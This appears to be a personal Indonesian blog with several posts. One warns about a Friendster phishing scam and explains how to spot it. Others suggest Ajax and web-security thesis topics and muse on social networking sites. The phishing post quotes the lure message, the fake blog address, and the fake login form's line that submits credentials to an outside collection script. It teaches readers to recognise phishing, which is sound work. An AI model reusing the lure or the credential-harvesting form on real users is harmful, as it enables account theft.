Friendster blog phising

wew...

Ternyata sampe sekarang friendster blog masih aja terbuka lebar untuk siapa aja melakukan tindakan ga bener..

Pernah dapet message seperti ini di friendster?

Eghh ad Cow2 cEw Show gt degh..ank2 Jkt niehh...Hasil Y!ntai NiEh..!! login Di -- http://gutyi.blogs.friendster.com...

Kalo pernah, hati-hati...
Boleh kamu lihat isi URL tersebut, tapi jangan sekali-kali login..

Karena yang kamu lihat saat itu adalah web friendster palsu atau
saat ini terkenal dengan istilah Web Phising..

Penipuan dengan cara menyalin tampilan pada web aslinya yang padahal ketika ada user yang menginputkan informasi account loginnya, maka form tersebut akan mengirimkan account yang diinput tadi ke website orang iseng yang melakukan phising tersebut..

Nah setelah informasi login tersebut sudah terkirim, sekarang orang iseng tadi akan bebas untuk login ke account friendstermu dan melakukan hal-hal yang .. mmm saya juga tidak tau deh.. seiseng apa dia.

Kira-kira apa hayo, coba ya kita list:

1. Ganti nama kamu (ah ga masalah)
2. Ganti profile kamu (eh.. yang mana ni?)
3. Ganti foto kamu (he.. masa sih?)
4. Ganti password kamu (wedew.. ga bisa login dong)
5. Melakukan tindakan yang mengatas namakan kamu
6. Hanya sekedar login, kirim message sebagai kamu untuk menyebarkan phising tersebut
7. yaaaa.. tergantung orang iseng tersebut lah

So pencegahannya?
sederhana.. seperti yang sudah saya jelaskan sebelumnya..
Jangan asal login... pastikan dulu bahwa tempat kamu login adalah web aslinya..
Tau yahoomail? Nah yahoomail sekarang sudah dilengkapi preventor password theft,
User bisa tau dan yakin bahwa form tersebut merupakan form asli yahoo mail dan bukan form buatan orang iseng yang kadang sangat mirip sekali dengan yahoomail asli.
Di yahoomail, user dapat memasukan image dia dan bla.. bla.. bla.. baca sendiri di yahoomail mengenai prevent password theft..

Okey... sekarang kita coba periksa kebenaran, apakah alamat
http://gutyi.blogs.friendster.com
Telah melakukan phising??

Secara harafiah kalo temen-temen familiar dengan friendster pasti akan berasumsi bahwa URL tersebut adalah URL dari friendster blog punya si gutyi.. yang secara jelas, ga mungkin ketika diakses, malah minta login friendster, ya gak?

Kalo ga percaya coba aja kamu jangan login friendster dulu (atau segeralah logout) dan lihat ke
(Kita coba nama orang yang merupakan nama familiar waktu kita SD)
http://budi.blogs.friendster.com/
Pasti akan keluar blognya si budi tanpa kita harus login
(sori ni mas Bud..)
ye kan??

Nah berbeda dengan URL pertama tadi, punya si gutyi. Yang nongol malah:

Halaman web yang mirip banget dengan halaman depan friendster dan terdapat tulisan
"You must login to see this blog"
wew... curiga dong.. Coba ah liat html code dari formnya..

Nah yang kita dapet ada tulisan gini:

< name="login_form" method="post" action="http://maxbestprofit.com/kue1.php">

hehe.. jelas banget bukan punya friendster ya..
Logikanya kalo web friendster, pasti ngirim nilai form yang diinput user pasti ke friendster dong.. karna dia yang punya database user2 friendster...

Ya sudahlah..

Kalo kamu cobain akses ke http://maxbestprofit.com,
Ternyata si orang iseng tersebut melakukan redirect ke www.google.com

Dan ketika kamu coba untuk iseng memasukan kata/kalimat asal ke form dan kamu klik login, maka datanya akan terkirim ke http://maxbestprofit.com/kue1.php dan selanjutnya akan di redirect ke friendster.com hehehe..

Nah kue1.php itu kira-kira apa ya?
Dapat ditebak adalah file PHP yang menangkap variable dari form palsu tersebut.

wew.. sebenarnya ada teknik pencurian account friendster yang lain, tapi kali ini rasanya ini aja dulu. Informasi ini pertama saya dapatkan dari rekan kerja saya dikantor (thanx.. mr.Ali). Kemudian barusan saya cek message friendster saya, ternyata saya telah dikirimi message oleh 2 orang kenalan saya yang isi messagenya merupakan ajakan untuk melihat blog si gutyi hehehe..

Well pesan saya buat mr. Gutyi..
Semoga iseng-isengnya ga terlalu edan... hehehe
Kasihanilah orang yang tidak sepintar dirimu

Riset Ajax 1

wew akhirnya gw sempet juga nulis tentang teknologi.
Kebetulan postingan kali ini, sebelumnya merupakan tulisan gw
di forum students kampus gw.. tepatnya disini.

Kebetulan akhir2 ini gw lagi sering browsing dan jarang nyetudent,
akhirnya dapet beberapa ide ..

ya.. kira-kira ini yang bisa gw share kali ini:

Ada permasalahan tentang Ajax yang bisa jadi penelitian TA (Tugas Akhir) untuk S1 Informatika (lebih nyambungnya kesitu sih, kalo jurusan lain boleh ya sok aja atuh):

1. Untuk yang suka Web Engineering kira-kira begini:
Ajax kata orang cepet, karena evolusi web engineering mau menjadikan web application menjadi secepat desktop application. Well... mungkin ga sih? Kira2 apa yang membuatnya jadi mungkin dan tidak mungkin? kira-kira bagimana cara kerja objek javascript yang mendukung ajax (XMLhttprequest) wew udah jadi latar belakang dan perumusan masalah nie

2. Untuk yang suka web engineering, tapi rada suka multimedia juga, kira-kira begini:
Menurut gw.. konsep membuat web application menjadi secepat desktop application udah Kuno!!.. Ajax itu ribet!! lo mesti belajar html/xhtml, javascript, xml, object oriented programming, mungkin ditambah php, DOM, css, dbms, wew... sederatan coding yang bikin males kayanya. Tapi emang apa boleh dikata? Kalo mau ajax, ya harus gitu.. Effort untuk coding ajax juga lebih besar dibanding web application tanpa ajax.. coba lo test sendiri.. Dan anehnya lagi, konsep Ajax itu juga baru dateng taun 2006 ini yang dikenalkan pertama kali oleh adaptivepath. Padahal kan objek XMLhttprequest udah lama.
Jauh sebelum itu, kita sudah mengenal teknologi flash dari macromedia (sekarang adobe).
Flash mirip dengan ajax, temen-temen yang udah nyemplung di actionscript programming ga perlu lagi untuk belajar javascript xhtml css DOM demi ajax.. Karena dengan flash application mereka, konsep yang dibawa ajax sudah menyerupai konsep ajax
Namun mungkin tetap ada pro dan kontranya...
Nah... justru itu.. mahasiswa jadi bisa dapet topik kan?!
Kita teliti aja perbandingan ajax dan flash.... wew.. terbentuk judul, perumusan masalah, latar belakang, batasan dan hipotesa awal kan.. hehe

3. Nah ini untuk yang suka web security:
isu yang ada di web security sekarang adalah SQL injection dan XSS (itu 2 web vulnerable yang paling sering terjadi menurut beberapa situs yang berfokus pada security). Kemudian banyak orang yang melakukan riset untuk melakukan pencegahannya.. Nah seiring dengan perkembangan waktu, Ajax menjadi fenomena baru dalam dunia web application.. Fenomena baru ini tentu saja membawa masalah baru.. pekerjaan baru paradigma pemrograman web yang baru dan user behaviour baru.. dan imbasnya juga mempengaruhi pada celah keamanan baru. hehehe.. Para developer ajax saat ini sedang memikirkan isu-isu seputar ajax security.. Nah sebagai mahasiswa stttelkom yang ga gaptek IT, tentu saja kemauan untuk ikutan ada dong.. apa lagi yang suka tantangan... ye ga sih?.. Nah.. mangga deh... coba diteliti ajax security dari berbagai aspek.


well.... kira2 segitu aja.. share gw kali ini
kira-kira keywordnya isu seputar web engineering, security, ajax


Karena tugas mahasiswa TA adalah bikin TA..
so... tips dari gw.. carilah masalah melalui isu yang ada di sekitarmu (bisa juga dari internet)
kemudian coba bandingkan dengan lingkungan yang mempengaruhinya
dan coba buat hipotesa sendiri... selanjutnya analisa.
Jangan terpatok bikin aplikasi aja meskipun coding di IF (informatika stttelkom) itu wajib, *he gimana sih?

Tapi tenang ada kok profesor di Universitas California of Santabarbara
yang Thesisnya cuma bikin firefox extension.... hehe tapi ga "cuma" nih..
Gw liat thesisnya buuhh... codiiing bosss!!! dan rada2 primitive gitu..
dia ngebongkar sourcenya firefox dan dia adaptasiin style codingnya
terus dia analisa cara kerja javascript engine.. dan jadi deh.. extension pencegah xss attack


well... my last word.. buat yang suka tantangan
Kerjakan TA mu dengan semangat..
Cari idealismemu tapi ya mikir waktu dan tenaga juga
mumpung masih mahasiswa... risetlah sebanyak-banyaknya.
Kalo udah kerja apalagi ga nyambung ama teknologi informasi
wew.. susah mo riset engineering gitu..

... tapi tergantung keadaan tiap orang sih..
santai aja lah brow..
choose ur life... positive thinking and always open minded
mohon maaf kalo ada kata-kata yang kurang berkenan
kalo mau menyanggah atau diskusi lebih lanjut.. sok wae atuh

Situs Pertemanan

Situs pertemanan hehe lucu namanya..
Tapi sejujurnya, situs-situs seperti itu tak dapat dipungkiri adalah suatu paradigma baru (saat ini) untuk bersosialisasi secara cyber di dunia internet dengan siapapun tak terbatas ruang dan waktu.
Contohnya:

• 
• 
• 
• 

• dll
  

Beberapa hanya tenar di bagian bumi tertentu namun beberapa lainnya dapat mengglobal. Kita dapat secara langsung berkomunikasi dengan musisi/artist yang bersangkutan. Well suatu ide yang cukup brilliant bukan? Bukankah hal tersebut merupakan impian para fans?

Satu kata yang merupakan inti dari ide dasar semua ini adalah "WEB TECHNOLOGY".
eh dua kata deng

Seorang Babi

Writing some knowledge, skill, technology or any academic stuff

Sampai postingan gw kali ini, ni tangan masih blum bisa nulis tentang teknologi, skill atau pengetahuan akademik yang yah setidaknya masih gw inget.

kenapa ya?

1. waktu?
2. motivasi?
3. kematangan ilmu itu sendiri?
4. cara penulisan?
5. keterbatasan elemen otak?
6. keakuratan?
7. pengukuran yang digunakan?
8. tujuan?
9. permasalahan?
10. batasan masalah?
11. kesimpulan?
12. saran?

halah.. kenapa mirip karya tulis ilmiah?